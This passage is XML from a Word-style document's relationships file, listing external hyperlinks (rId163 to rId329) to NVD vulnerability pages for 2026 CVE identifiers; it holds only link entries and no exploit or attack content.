Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69628" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69629" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69632" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69649" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69671" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69676" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69678" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69686" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69712" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69722" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69729" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69740" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69742" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69759" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69764" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69767" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69772" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69778" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69784" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69797" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70351" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70586" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71352" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72933" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72940" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72950" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72959" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72960" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72972" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72973" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72986" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73012" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73013" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73018" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73023" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77105" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77106" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77504" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77901" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77906" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77907" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77908" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78439" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78442" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78462" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78463" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78504" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78505" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78507" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78511" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78512" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78514" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78517" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78518" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78519" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78521" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78524" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78525" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78526" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78834" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79376" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79602" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80074" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80077" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80080" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80081" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80085" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81352" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81385" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81952" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81955" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81996" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82536" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83941" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83998" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85877" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86076" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86083" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86730" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12611" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33197" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62648" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62649" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62650" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73314" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73316" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77111" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80219" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86727" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86732" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86738" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34223" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61517" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75990" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75991" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76190" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76199" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77109" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77774" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79721" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80097" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86509" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86510" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86712" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86722" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58113" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74860" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75993" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85384" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75999" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77827" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86819" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19203" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69646" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81821" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81822" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72958" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72961" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72962" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76191" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76202" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77097" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77968" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81356" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81357" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81378" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81379" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83939" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86600" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47297" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55007" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69325" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69380" TargetMode="External" Id="rId329" /><Relationship 